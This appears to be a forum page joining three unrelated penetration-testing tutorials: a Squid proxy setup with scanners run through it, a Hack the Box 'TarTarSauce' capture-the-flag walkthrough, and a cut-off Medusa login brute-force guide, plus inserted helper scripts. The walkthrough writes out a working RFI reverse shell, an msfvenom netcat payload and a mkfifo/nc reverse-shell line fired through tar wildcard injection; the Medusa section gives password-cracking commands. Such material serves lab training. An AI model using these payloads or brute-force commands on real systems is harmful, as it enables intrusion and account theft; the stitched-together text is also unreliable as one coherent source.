Table of Contents
- Introduction to Proxy Setting
- Squid Proxy Installation
- Squid Proxy Server Configuration
- Configuring Apache service for Web Proxy
- Web Proxy Penetration Testing
- Directory Brute force Attack on Proxy Server Using DIRB Tool
- Vulnerability Scanning on Proxy Server Using Nikto Tool
- SQL Injection on Proxy Server Using Sqlmap Tool
- WordPress Scanning on Proxy Server Using WPScan Tool
A proxy is a computer system or program that acts as an intermediary between your web browser and another computer. Your ISP operates servers (computers designed to deliver information to other computers) and uses proxy servers to speed up the transfer of information between those servers and your computer.
For example, if two users, A and B, request the same website, the proxy does not fetch the page from the origin server a second time: it has stored (cached) a copy of the site after the first request and serves that copy to the second user without troubling the origin server.
Squid Proxy Installation
Squid is a caching web proxy that offers proxy and cache services for HTTP, FTP and other common network protocols, including tunnelling of SSL/TLS (CONNECT) requests, caching of DNS lookups and transparent (interception) caching. It also supports a wide variety of cache-coordination protocols.
Let’s Begin!!
Open /etc/hosts on your local machine and add an entry mapping the machine's hostname to its address, because Squid must be able to resolve its own hostname when it starts (by default it looks up the system hostname, which here is Ubuntu).
![[Image: 0.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-noAiJvAvQJY/W-20_nfcawI/AAAAAAAAbIY/N86Wqoe1u-U3r470M-EIhvI9iO1YOFsBQCLcBGAs/s1600/0.png?w=687&ssl=1)
Now install squid3 from the apt repository with the following command:
apt-get install squid3
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-M1LKzO3tHRk/W-20_joDnvI/AAAAAAAAbIg/tpgHQbeznNsUU70cy2O0v3sZh8o8fjmUwCLcBGAs/s1600/1.png?w=687&ssl=1)
Squid Proxy Server Configuration
Once the installation completes, open the configuration file /etc/squid3/squid.conf.
With Squid's access control lists (ACLs) you can restrict use of the proxy to clients coming from specific source IP addresses.
Suppose you want to grant access only to users on the 192.168.1.0/24 subnet; add the following line to the ACL section of squid.conf:
acl lan src 192.168.1.0/24
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-0kw_El5pYEg/W-21CcHJtAI/AAAAAAAAbJE/ndFWqjSt_SQ6TGGXccmH96BQ6nbNQzVrACLcBGAs/s1600/2.png?w=687&ssl=1)
Now allow clients matching that ACL to use the proxy. Squid evaluates http_access rules top to bottom and stops at the first match, so this line must appear before the http_access deny all rule that the stock squid.conf already contains; otherwise every client is refused.
http_access allow lan
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-qNdFn2E0mPA/W-21CuXcZBI/AAAAAAAAbJI/3YLqyDQbfTspXEWfTZ1-awXUreDGCInSwCLcBGAs/s1600/3.png?w=687&ssl=1)
To make Squid listen on the default TCP port 3128, set the http_port directive as shown:
http_port 3128
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-fuvtDCAz3tc/W-21C7lpUJI/AAAAAAAAbJM/UuZVPI_HHco_JCGvOxUj7SeEBm862Kc8QCLcBGAs/s1600/4.png?w=687&ssl=1)
Then add the following rules after http_port. They strip request headers that would reveal the client (Referer, X-Forwarded-For) or the path through the proxy (Via) to the origin server. Note that request_header_access only filters headers received from the client; the Via header Squid adds itself is controlled by the separate via directive (via off).
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-Ucft8_8wSB8/W-21DCzFXmI/AAAAAAAAbJQ/efjnoDcUxe4w__oatpK2jDI_nVgPmDTCQCLcBGAs/s1600/5.png?w=687&ssl=1)
The forwarded_for directive accepts on|off|transparent|truncate|delete:
- If set to “on”, Squid will append your client’s IP address in the HTTP requests it forwards. By default it looks like:
- If set to “off”, it will appear as
- If set to “transparent”, Squid will not alter the
- If set to “delete”, Squid will delete the entire
- If set to “truncate”, Squid will remove all existing
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-buyE2tCVoY4/W-21DG-6ivI/AAAAAAAAbJU/lZCOYIhKlBkw0jt3NKXkI1aGlYTgdBV7QCLcBGAs/s1600/6.png?w=687&ssl=1)
Here we set forwarded_for off. Save the file, then restart Squid with the following command:
sudo service squid3 restart
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-O_QdjzX0twc/W-21DTdJBvI/AAAAAAAAbJY/-9KAQTpWjzo72pkKEzGOepmCydNC8zvDgCLcBGAs/s1600/7.png?w=687&ssl=1)
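The fragment below is an added example, not part of the original article: it renders a Squid 3 access policy with the rules discussed above (default-deny included, plus via off and forwarded_for delete) and checks the one ordering mistake that most often breaks a new proxy, an http_access allow placed after http_access deny all. The output path, the LAN range and the Safe_ports list are assumptions to adjust for your own network.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): render a hardened Squid 3
# policy and verify the http_access rule order before restarting the proxy.
set -u

# Print the configuration fragment. forwarded_for delete removes the client
# address entirely (off would still send "X-Forwarded-For: unknown"), and
# via off is needed because request_header_access only filters headers that
# arrive from the client, not the Via header Squid appends itself.
render_squid_conf() {
  local lan="${1:-192.168.1.0/24}"   # assumed LAN range
  cat <<EOF
http_port 3128
acl lan src $lan
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow lan
http_access deny all
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all
forwarded_for delete
via off
EOF
}

# Return 0 if the first "http_access allow" precedes "http_access deny all",
# 1 if deny-all comes first or either rule is missing (first match wins in
# Squid, so an allow below deny-all never fires).
check_http_access_order() {
  local conf="$1" allow_ln deny_ln
  allow_ln=$(grep -n -E '^[[:space:]]*http_access[[:space:]]+allow' "$conf" | head -n1 | cut -d: -f1)
  deny_ln=$(grep -n -E '^[[:space:]]*http_access[[:space:]]+deny[[:space:]]+all' "$conf" | head -n1 | cut -d: -f1)
  [ -n "$allow_ln" ] && [ -n "$deny_ln" ] && [ "$allow_ln" -lt "$deny_ln" ]
}

# Write the config, check the order, then let Squid parse it when installed
# (squid3 -k parse exits non-zero on a syntax error). Path is an assumption.
install_squid_conf() {
  local out="${1:-/etc/squid3/squid.conf}" lan="${2:-192.168.1.0/24}"
  render_squid_conf "$lan" > "$out" || return 1
  check_http_access_order "$out" || { echo "http_access order wrong in $out" >&2; return 1; }
  if command -v squid3 >/dev/null 2>&1; then
    squid3 -k parse -f "$out"
  fi
}

# Usage: ./squid_policy.sh /etc/squid3/squid.conf 192.168.1.0/24
if [ $# -gt 0 ]; then install_squid_conf "$@"; fi
```

Run the check against your real squid.conf as well: the stock file ends with http_access deny all, so any allow you add below that line is dead.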
Configuring Apache service for Web Proxy
Now open /etc/apache2/sites-available/000-default.conf and add the following block, which restricts the /var/www/html directory to requests arriving from localhost or the machine's own IP (192.168.1.103). Because Squid runs on that same machine, requests that pass through the proxy reach Apache from 192.168.1.103 and are allowed, while clients that connect to port 80 directly are refused. (Order/Deny/Allow is Apache 2.2 syntax; on Apache 2.4 it requires mod_access_compat, and the native equivalent is Require ip 127.0.0.1 192.168.1.103.)
<Directory /var/www/html/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order deny,allow
deny from all
allow from 127.0.0.1 192.168.1.103
</Directory>
Now save the file and restart the Apache service so the change takes effect:
service apache2 restart
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-nn0T_UpJj-E/W-21Dl0Ee4I/AAAAAAAAbJc/WnONI5XuzSQNKCl4K7zWpvRPxM4XxXlmgCLcBGAs/s1600/8.png?w=687&ssl=1)
Now anyone who tries to reach the web server at 192.168.1.103 directly is greeted with the following page:
"Error 403 Forbidden: You don't have permission to access <requested page>".
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-q4RpDemsITc/W-21EHxuD3I/AAAAAAAAbJg/d9P_nMDdGzoU68wqf0TKTGXsg8Vsg3akgCLcBGAs/s1600/9.png?w=687&ssl=1)
From the attacker's side, a port 80 that is open but answers every request with 403 is a sign that access is being gated, for example to clients arriving through a proxy. The sections below show how to test that hypothesis and how to point each tool at the proxy.
![[Image: 10.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-i-p2mi7dnT4/W-20_utinkI/AAAAAAAAbIc/Y7hINT_5BeQA3VwyPIcBHTbpsZYAHxWtgCLcBGAs/s1600/10.1.png?w=687&ssl=1)
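The script below is an added example and not part of the original article. It requests the same URL once directly and once through the proxy, then classifies the pair of status codes: 403 direct but 2xx via proxy is the gated setup built above, 403 from both usually means the proxy's own ACL rejected you (Squid's Access Denied page), and 000 is curl's code for "no response at all". The target URL and proxy address are command-line arguments; the classifier is a pure function so it can be checked without a network.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): probe a target directly and
# through a proxy and classify how access to it is gated.
set -u

# Return only the HTTP status code. curl prints 000 when no response arrived
# (connection refused, timeout, proxy down), which we treat as unreachable.
http_status() {
  local url="$1" proxy="${2:-}"
  if [ -n "$proxy" ]; then
    curl -s -o /dev/null -m 10 -x "$proxy" -w '%{http_code}' "$url" 2>/dev/null || true
  else
    curl -s -o /dev/null -m 10 -w '%{http_code}' "$url" 2>/dev/null || true
  fi
}

# Pure decision logic: direct status vs. proxied status.
classify_gate() {
  local direct="$1" proxied="$2"
  case "$direct:$proxied" in
    403:403)       echo "denied-both" ;;        # typically the proxy ACL refused us (Squid "Access Denied")
    403:2*|403:3*) echo "proxy-gated" ;;        # origin serves only requests that come via the proxy
    000:2*|000:3*) echo "proxy-only" ;;         # origin not reachable directly at all
    2*:2*|3*:3*)   echo "open" ;;               # reachable either way; the proxy adds nothing
    *:000)         echo "proxy-unreachable" ;;  # check proxy address/port
    *)             echo "inconclusive" ;;
  esac
}

# Probe one URL and print a one-line verdict.
gate_probe() {
  local url="$1" proxy="$2" direct proxied
  direct=$(http_status "$url")
  proxied=$(http_status "$url" "$proxy")
  printf '%s direct=%s via-proxy=%s verdict=%s\n' \
    "$url" "$direct" "$proxied" "$(classify_gate "$direct" "$proxied")"
}

# Usage: ./gate_probe.sh http://192.168.1.103/ http://192.168.1.103:3128
if [ $# -eq 2 ]; then gate_probe "$1" "$2"; fi
```

Use the verdict to pick the flag for each tool that follows (dirb -p, nikto -useproxy, sqlmap --proxy, wpscan --proxy); a "denied-both" result means you must first get a source address the proxy's ACL accepts.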
Web Proxy Penetration Testing
For web proxy penetration testing we had already set up lab web application servers: DVWA and SQLi Dhakkan (read the article at [To see content please register here]) and WordPress (read the article at [To see content please register here]). To test whether the proxy server is working, open Firefox, go to Edit > Preferences > Advanced > Network > Settings, select "Manual proxy configuration", enter the proxy server IP address (192.168.1.103) and port (3128), and tick the option to use this proxy for all protocols.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-zJyfl4XMp9Y/W-21Ai7BvvI/AAAAAAAAbIk/Gc5CpTvJSYIHFEoFFxLpwxYIE879nKY9wCLcBGAs/s1600/10.png?w=687&ssl=1)
Connected to the proxy server successfully using the HTTP proxy setting in the browser.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-RsL8MmqOPTg/W-21A-icfII/AAAAAAAAbIo/9cZIuqlbUT4L3V_9P3VO6MOBTUihXBKjQCLcBGAs/s1600/11.png?w=687&ssl=1)
Directory Brute force Attack on Proxy Server Using DIRB Tool
When running a directory brute-force with DIRB, the -p option sets a proxy to be used for all requests (if you omit the port, DIRB defaults to 1080). As observed above, opening the target IP in a browser produced an access-forbidden error, so we run DIRB once directly and once through the proxy:
dirb [To see content please register here]
dirb [To see content please register here] -p 192.168.1.103:3128
From the image below you can compare the results: the first command found no directory or file, whereas the second, sent through the proxy, executed successfully.
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-PGcnLcLVyH0/W-21BArl0HI/AAAAAAAAbIs/5tQViK_zu7Uaokw5IyNXor8Mq0dW8QhDgCLcBGAs/s1600/12.png?w=687&ssl=1)
Vulnerability Scanning on Proxy Server Using Nikto Tool
Similarly, when scanning a web server that is reachable only through the proxy, use Nikto's -useproxy option:
nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy [To see content please register here]
From the image below you can compare the results: the first command returned nothing, whereas the second, sent through the proxy, executed successfully.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ftUo3E4_Whc/W-21BdbuFpI/AAAAAAAAbIw/PxEIS-btFF4wktrdiGwa0Y_F_o1Uz80xgCLcBGAs/s1600/13.png?w=687&ssl=1)
SQL Injection on Proxy Server Using Sqlmap Tool
As observed above, running sqlmap directly against the target returns a 403 Forbidden error, which indicates that the page is served only to requests arriving through the proxy.
sqlmap -u [To see content please register here] --dbs
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-YjS9fAPSoK0/W-21BnaOnZI/AAAAAAAAbI0/5ETLLKQpFccIVmkTP1Es5b3o2ClBEWQTgCLcBGAs/s1600/14.png?w=687&ssl=1)
Hence we use sqlmap's --proxy option to reach the target URL through the proxy:
sqlmap -u [To see content please register here] --dbs --proxy [To see content please register here]
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-X1gT3l51oJo/W-21BxKFOEI/AAAAAAAAbI4/F7ZJjlWxmWwlYDI0mXwxe3K1hH0QDh_EQCLcBGAs/s1600/15.png?w=687&ssl=1)
From the image below you can observe that we successfully retrieved the database names by exploiting the SQL injection vulnerability.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-FY0JFaByAAU/W-21BzujkBI/AAAAAAAAbI8/62uCu5bGNlQn_6BSBAVAFXeOkuW5qF-2ACLcBGAs/s1600/16.png?w=687&ssl=1)
WordPress Scanning on Proxy Server Using WPScan Tool
As observed above, running WPScan directly returns a 403 Forbidden error, again because the page is served only to requests arriving through the proxy.
wpscan --url [To see content please register here] --wp-content-dir wp-content
Hence we use WPScan's --proxy option to connect to the target URL through the proxy:
wpscan --url [To see content please register here] --wp-content-dir wp-content --proxy [To see content please register here]
Hopefully this article has helped you understand how a proxy server works and how to run common web testing tools through one.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-GUCLGxHSSv4/W-21CEyYhXI/AAAAAAAAbJA/Tx0IudWmj8g7YjfI_Y4SHSYBlgIrfpQCACLcBGAs/s1600/17.png?w=687&ssl=1)
Today we are going to solve another CTF challenge, "TarTarSauce". It is a retired vulnerable lab from Hack the Box, which helps pentesters practise online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Expert
Task: Find the user.txt and root.txt files
Note: Since these labs are available online they have static IPs. The IP of TarTarSauce is 10.10.10.88
Penetrating Methodology
- Network scanning (Nmap)
- Directory Enumeration (Dirb)
- Exploiting WordPress against RFI Vulnerability
- Spawning TTY shell
- Check sudoers list permissions
- Wildcard injection privilege escalation
- Modify the backup file to get root flag
Let's start with a basic nmap scan to find the open ports and services.
nmap -A 10.10.10.88
From the image below you can observe that port 80 is open for HTTP, and nmap reports a robots.txt with 5 disallowed entries.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-DNg3pCHEqpI/W_5fAEe1MKI/AAAAAAAAbe8/7y4eKq4rA7c6D5U_nk6OZeokcs2qOHomACLcBGAs/s1600/1.png?w=687&ssl=1)
Let's navigate to port 80 in a web browser. Entering the IP in the URL bar brings up the web page shown below.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-IK7UTS4M2U0/W_5fBYu4dAI/AAAAAAAAbfM/IxtyzS83nhYBbQW7MrexJ5dmQsJQCOXrwCLcBGAs/s1600/2.png?w=687&ssl=1)
We don't find anything on the web page, so we run dirb to enumerate directories and find one called "/webservices/". That directory shows nothing itself, so we enumerate inside it as well.
dirb [To see content please register here]
dirb [To see content please register here]
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jtpNYXTM-jg/W_5fBQ4Q_vI/AAAAAAAAbfQ/Xtqm-L5kMAsKG2nWmfcJd9bjCwfq2RbEwCLcBGAs/s1600/3.png?w=687&ssl=1)
Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-uix126wmm6I/W_5fBglMrPI/AAAAAAAAbfU/igJR9mkKMocOHFPzH_kL6aLCeB_LI6LpwCLcBGAs/s1600/4.png?w=687&ssl=1)
We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called "Gwolle Guestbook". Searching for an exploit shows that it is vulnerable to Remote File Inclusion (RFI).
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Kl24DlmgSOQ/W_5fB_qMFkI/AAAAAAAAbfY/a_XW0XJNqawfA5FQwe8yX0Hy9Yg7rLWggCLcBGAs/s1600/5.png?w=687&ssl=1)
We follow the proof of concept on exploit-db and use the php-reverse-shell.php shipped with Kali Linux. We copy it to the desktop and rename it wp-load.php, because the vulnerable plugin appends wp-load.php to the attacker-supplied path before including it. We then start a Python HTTP server so the target can fetch our shell through the RFI.
python -m SimpleHTTPServer 80
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-I9aEoaRckDE/W_5fB_1OrLI/AAAAAAAAbfc/I6o8pFr75cEe4paEqhT3TUDgnl6StyH9QCLcBGAs/s1600/7.png?w=687&ssl=1)
We set up a netcat listener and, as soon as our PHP shell is included through the RFI, we get a reverse shell. In /home we find a folder called "onuma" that we cannot access, so we spawn a TTY shell using python and check the sudoers list.
python -c "import pty; pty.spawn('/bin/bash')"
The sudoers list shows that we can run tar as user "onuma" without a password, so we can exploit tar wildcard injection for privilege escalation.
sudo -l
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-SEgWjqN100k/W_5fCfyITZI/AAAAAAAAbfg/Y1L0FoVs_1A_aY0wt5_uR1fpjD8qZDJPgCLcBGAs/s1600/8.png?w=687&ssl=1)
We create a netcat reverse-shell one-liner with msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-lW6N_CFqiFU/W_5fCsVnTII/AAAAAAAAbfk/HcIkaF2BPPY3szbQebcIkHgb436n3vj4gCLcBGAs/s1600/9.png?w=687&ssl=1)
Back in the reverse shell we save that netcat command in a script named "wp.sh".
tar can execute a command at every archive checkpoint through --checkpoint-action=exec=... combined with --checkpoint=N. The permitted command is tar cf archive.tar * with an unquoted glob, so the shell expands * into the names of the files in the current directory before tar runs, and GNU tar accepts option-looking arguments anywhere on its command line. We therefore create two empty files whose names are exactly those options, "--checkpoint-action=exec=sh wp.sh" and "--checkpoint=1", and tar, running as onuma, executes wp.sh for us.
mkdir data
cd data
echo "mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0</tmp/cezbk | /bin/sh>/tmp/cezbk 2>&1; rm /tmp/cezbk" > wp.sh
echo "" > "--checkpoint-action=exec=sh wp.sh"
echo "" > --checkpoint=1
sudo -u onuma /bin/tar cf archive.tar *
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-VSMVd8YJpXc/W_5fAK3Kn_I/AAAAAAAAbe4/KVKdeOAwYbYMV-8jdphGEUYNI-nwpvuKgCLcBGAs/s1600/10.png?w=687&ssl=1)
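To see exactly why the glob is the problem, here is an added example (not from the original write-up) that reproduces the injection locally as an unprivileged user in a scratch directory, then runs the same archive command with "--" to show that it no longer fires. The payload only writes a marker file where the write-up used a netcat reverse shell; the directory names are assumptions, and GNU tar is required for the --checkpoint options.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): local reproduction of GNU
# tar wildcard injection, plus the invocation that is immune to it.
set -u

# Populate a scratch directory the way the write-up did: a payload script and
# two empty files whose *names* are tar options.
setup_wildcard_dir() {
  local dir="$1" marker="$2"
  mkdir -p "$dir"
  printf 'id -un > "%s"\n' "$marker" > "$dir/wp.sh"   # benign stand-in for the reverse shell
  : > "$dir/--checkpoint=1"
  : > "$dir/--checkpoint-action=exec=sh wp.sh"
}

# The vulnerable form, exactly as the sudo rule allowed it. The shell expands
# '*' to the file names, tar permutes its arguments, and the two crafted names
# are consumed as options, so "sh wp.sh" runs at the first checkpoint.
# Returns 0 if the payload ran (marker exists).
vulnerable_tar() {
  local dir="$1" marker="$2"
  rm -f "$marker" "$dir/archive.tar"
  ( cd "$dir" && tar cf archive.tar * ) >/dev/null 2>&1
  [ -f "$marker" ]
}

# The safe form: '--' ends option parsing, so every expanded name is treated
# as a member path ("tar cf archive.tar ./*" works for the same reason).
# Returns 0 if the payload did NOT run.
safe_tar() {
  local dir="$1" marker="$2"
  rm -f "$marker" "$dir/archive.tar"
  ( cd "$dir" && tar cf archive.tar -- * ) >/dev/null 2>&1
  [ ! -f "$marker" ]
}

# Stand-alone demo in a temporary directory.
demo() {
  local dir marker
  dir=$(mktemp -d)
  marker="$dir/marker.txt"
  setup_wildcard_dir "$dir/data" "$marker"
  if vulnerable_tar "$dir/data" "$marker"; then
    echo "unquoted glob: payload ran as $(cat "$marker")"
  else
    echo "unquoted glob: payload did not run (not GNU tar?)"
  fi
  if safe_tar "$dir/data" "$marker"; then
    echo "with --: payload did not run; crafted names were archived as ordinary files"
  fi
  rm -rf "$dir"
}
demo
```

The fix on the defending side is the same thing the safe form shows: never let a privileged tar (or rsync, chown, zip, all of which have similar option-injection paths) see an unquoted glob, and prefer "--" or "./*" so that user-controlled file names can never become options.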
We set up our netcat listener and, as soon as the tar command runs as user "onuma", we get a reverse shell as "onuma". We change directory to /home/onuma, find the file "user.txt" and read the first flag from it. After that we spawn a TTY shell using python.
python -c 'import pty; pty.spawn("/bin/bash")'
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-qriDEWmPIxc/W_5e_6OYNfI/AAAAAAAAbe0/1S1gFLSHNw407_KiOtRLyO--elhkGyCsACLcBGAs/s1600/11.png?w=687&ssl=1)
Enumerating the system, we find a file called backuperer which is symlinked to a file named "backup" in the /usr/local/bin directory.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-b6sgb2bU1WE/W_5fAl7woNI/AAAAAAAAbfA/LJ4-bUIgSZoXK-Xai3wUogalZGJWBToUwCLcBGAs/s1600/13.png?w=687&ssl=1)
Looking at its contents, it is a script that creates a gzip archive of the files inside "/var/www/html/" and, 30 seconds after creating the archive, checks the archive's integrity.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Vil5BJqS_04/W_5fA9ZMe9I/AAAAAAAAbfE/KBCBRZgeafsz-pDn2vVo74pSk1B1YQBNgCLcBGAs/s1600/14.png?w=687&ssl=1)
We use a script that takes advantage of that sleep: because the backup script waits 30 seconds before checking the archive's integrity, we have a 30-second window in which to replace the archive with our own. We use this script
[To see content please register here]
. After running the script we find the root flag.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-3JR642XKEXo/W_5fA-s3EyI/AAAAAAAAbfI/wYBov-Dr0GkNT7VTvp_RYUIQBkC3cnpcwCLcBGAs/s1600/15.png?w=687&ssl=1)
Hello friends!! Today we discuss how effective Medusa is at cracking the login credentials of various protocols in order to gain unauthorized remote access to a system. In this article we cover each option Medusa offers for brute-force attacks in various scenarios.
Table Of Content
- Introduction to Medusa and its features
- Password Cracking For Specific Username
- Username Cracking for Specific Password
- Cracking Login Credential
- Making Brute Force Attack on Multiple Host
- Attacking on Specific Port Instead of Default
- NULL/Same as Login Attempt
- Save logs to Disk
- Stop on Success
- Suppress Startup Banner
- Verbose Mode
- Error Debugging Mode
- Using Combo Entries
- Resuming the Brute Force Attack
Medusa is a speedy, parallel and modular login brute-forcer. Its goal is to support as many services that allow remote authentication as possible. The author considers the following to be some of its key features:
- Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
- Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
- Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
- Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3, MS-SQL, SSHv2, among others)
Type medusa in the terminal without any options and it will dump all the options it accepts along with their descriptions.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 – 6 (more)]
-w [NUM] : Error debug level [0 – 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-hV8HPX1PLhw/W-wp8PoXfiI/AAAAAAAAbG4/_3ydTMsdR3ErYuNXQBLZmmvz7sBadBEawCLcBGAs/s1600/1.png?w=687&ssl=1)
As said above, Medusa is modular; use the -d option to list all the modules it ships with.
![[Image: 2.1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-CGwuZOmeUEA/W-wp-QAJ2YI/AAAAAAAAbHQ/awPg3DDJGJA6e1FUiwAqIWELOWfGPSTDQCLcBGAs/s1600/2.1.png?w=687&ssl=1)
Password Cracking For Specific Username
Medusa is a very effective tool and also quite easy to use for brute-forcing any supported protocol.
Assume you already know the username of an FTP account (or any other service) and only want to brute-force its password using a dictionary.
In that case use the following command, where -u sets the single username and -P supplies the password dictionary.
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp
As you can observe, it found one valid password, 123, for username raj on the FTP login.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-3-Mo1hev7sM/W-wp-27PtnI/AAAAAAAAbHY/3WNm5haneX874lmybgqjzliCKA3z25hqQCLcBGAs/s1600/2.png?w=687&ssl=1)
Username Cracking for Specific Password
Assume instead that you know the password but not the username for FTP (or any other service) and want to brute-force the username with a dictionary; this is the reverse of the situation above.
In that case use the following command, where -U supplies the username dictionary and -p sets the single password.
medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp
As you can observe, it found one valid username, raj, for password 123 on the FTP login.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-QbAWkm27XpY/W-wp_Xswg0I/AAAAAAAAbHc/G57xV2i4G1UGtETAxEqfpGSxdoBX6oN1ACLcBGAs/s1600/3.png?w=687&ssl=1)
Cracking Login Credential
Suppose you know neither the username nor the password for FTP (or any other service) and want to brute-force both with dictionaries to find a valid combination.
In that case use the following command, where -U supplies the username dictionary and -P supplies the password dictionary.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
As you can observe, it found one valid login, raj with password 123, on FTP.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Cpm60O6TWQM/W-wp_u2E5OI/AAAAAAAAbHg/3Yx57a2hLnUIVJCva__0eFakr60eA3njACLcBGAs/s1600/4.png?w=687&ssl=1)
Making Brute Force Attack on Multiple Host
If you want to run the same user and password dictionaries against multiple hosts in a network, use the -H option, which takes a file of target hosts; Medusa then tries the same login attempts against each host IP listed in the file.
Here I saved two host IPs in a text file and ran the following command to brute-force both hosts with the same dictionaries.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp
As you can observe, it found a valid FTP login on each of the two hosts.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-CvTkQfYDeRI/W-wqAMKwM8I/AAAAAAAAbHk/5nTq7EdVCP0yzncjIIQgSE_xu2Ffe8QAACLcBGAs/s1600/5.png?w=687&ssl=1)
If your host list is long, the -T option controls how many hosts Medusa tests concurrently; the remaining hosts are queued until a slot frees up (no host is skipped).
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2
As you can observe below, the first command attacks one host IP at a time, whereas the second attacks two host IPs simultaneously.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-VIwUEBxS_lg/W-wqA6zAMxI/AAAAAAAAbHs/m1o3yVWniPEpYLBHeoTdh5WIubj9MuJRwCLcBGAs/s1600/6.png?w=687&ssl=1)
Attacking on Specific Port Instead of Default
